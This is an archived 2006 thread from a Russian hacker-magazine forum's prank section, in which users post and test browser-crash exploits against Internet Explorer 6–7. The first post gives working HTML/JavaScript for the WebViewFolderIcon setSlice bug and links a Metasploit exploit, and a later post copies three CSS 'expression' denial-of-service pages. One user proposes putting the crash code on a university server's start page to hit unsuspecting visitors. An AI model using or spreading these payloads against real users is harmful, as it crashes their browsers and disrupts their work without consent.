Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Cвежий баг IE!

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Западло] >> Cвежий баг IE!
Имя
Сообщение << Старые топики   Новые топики >>
Cвежий баг IE! - 2006-12-06 14:13:30.796666   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
 Код - убийца IE6-7
quote:


&lt;html&gt;&lt;body&gt;&lt;script&gt;

// MoBB Demonstration
function Demo() {
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
}

&lt;/script&gt;

Clicking the button below may crash your browser!&lt;br&gt;&lt;br&gt;
&lt;input type='button' onClick='Demo()' value='Start Demo!'&gt;

&lt;/body&gt;&lt;/html&gt;

Проверить своего осла на багу онлайн!
http://www.microsoft.com/technet/security/bulletin/MS06-057.mspx - линк на билютень уязвимости мелкомягких…заплатки там.
http://metasploit.com/projects/Framework/exploits.html#ie_webview_setslice - рабочий сплоит, использующий эту багу
Post #: 1
RE: Cвежий баг IE! - 2006-12-06 16:03:36.843333   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
 Свежайший! Аж от 10 Октября! Практически 0day! Молодец, птичка!
Post #: 2
RE: Cвежий баг IE! - 2006-12-06 17:59:22.156666   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
quote:

ORIGINAL: Pupkin-Zade

Свежайший! Аж от 10 Октября! Практически 0day! Молодец, птичка!

Ну всё относительно…;) Для ламеров он и через полгода будет свежим, так как дырку они не закроют…
Post #: 3
RE: Cвежий баг IE! - 2006-12-06 18:26:51.810000   
Technologist

Сообщений: 3590
Оценки: 0
Присоединился: 2006-10-28 20:28:06.943333
 Аццко, мне нортоновский фаервол кричит, что я сам себя атакую [sm=zhaba.gif]
Post #: 4
RE: Cвежий баг IE! - 2006-12-06 18:40:50.750000   
devi_29

Сообщений: 133
Оценки: 0
Присоединился: 2006-11-26 16:51:24.136666
     Осёл сразу загнулся :) :D - надо будет на старовую станичку сервера у нас в университете забацать :)
Post #: 5
RE: Cвежий баг IE! - 2006-12-06 18:47:56.483333   
Technologist

Сообщений: 3590
Оценки: 0
Присоединился: 2006-10-28 20:28:06.943333
 Мозилла [sm=em121.gif]. А IE [sm=scull.gif]
Post #: 6
RE: Cвежий баг IE! - 2006-12-06 18:50:52.750000   
illich

Сообщений: 342
Оценки: 0
Присоединился: 2004-12-14 21:34:35
 Ну не знаю, специально для этого запустил свой IE неизвестной сборки, так обычно пользуюсь им редко и на проверенных ресурсах, посему и не обновляю.
И по барабану ему ентот тест, всё в порядке.
Post #: 7
RE: Cвежий баг IE! - 2006-12-06 19:09:43.453333   
Sma11erM1nd

Сообщений: 123
Оценки: 0
Присоединился: 2006-06-10 03:56:35
 Сначала ослик выдал ошибку, потом докторВатсон, которого я после переустановки забыл убить, так вот заоодно и убил…
ПОра уже всем переходить на ОгненнуюЛису!
Post #: 8
RE: Cвежий баг IE! - 2006-12-07 11:24:46.126666   
-=lebed=-

Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
 Ну вот вам уж точно свежачки!
Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)

Автор: José Carlos Nieto Jarquín
Дата: Ср. 6 Дек. 2006 11:01

Tested under Windows XP SP2, MSIE 6.0.2900.2180

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>

Exploit 2
<div style="width: expression(window.open(self.location));">
 
</div>

Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder :(. It sucks, don't use it :).
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>

Тестите на здоровье!
Post #: 9
RE: Cвежий баг IE! - 2006-12-07 16:39:15.546666   
Ded MustD!e

Сообщений: 567
Оценки: 0
Присоединился: 2006-07-23 17:19:08
 Первый эксплойт повесил осла(снял задачу через диспетчер), второй и третий открыли несколько левых окошек, но при свободном закрытии главного первого окна все убиралось => 1-норм; 2 и 3 - хуйня.
Post #: 10
RE: Cвежий баг IE! - 2006-12-13 03:17:00.860000   
Diabolus

Сообщений: 127
Оценки: 0
Присоединился: 2006-11-18 05:35:27.343333
quote:


Свежайший! Аж от 10 Октября! Практически 0day! Молодец, птичка!

бугого :)

quote:


Ну всё относительно… Для ламеров он и через полгода будет свежим, так как дырку они не закроют…

хм.. ну ты это написал на форуме, следовательно - для участникоф форума.. а если считаешь, что свеж он для ламероф, и при этом написал, что он свежий… делаем вывод, что все участники форума причисляюцо к ламерам. бан за неуважительное отношение к участникам форума + административное взыскание в размере 5 минимальных окладоф труда * кол-во зарегистрированных пользователей форума ;)
Post #: 11
RE: Cвежий баг IE! - 2006-12-27 16:49:28.760000   
ARIY

Сообщений: 41
Оценки: 0
Присоединился: 2006-11-28 22:33:45.326666
 Ну и че? Первый раз за последний год запустил осла. Зашел на пагу и нифига-живой гад.
Post #: 12
RE: Cвежий баг IE! - 2006-12-27 19:57:19.223333   
]SAPER[

Сообщений: 357
Оценки: 0
Присоединился: 2006-08-30 14:34:48
quote:

ORIGINAL: ARIY

Ну и че? Первый раз за последний год запустил осла. Зашел на пагу и нифига-живой гад.

а ты не думал что винда сама на него заплатки скачала
и нах этот топик было наверх поднимать???:@
Post #: 13
Страниц:  [1]
Все форумы >> [Западло] >> Cвежий баг IE!







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.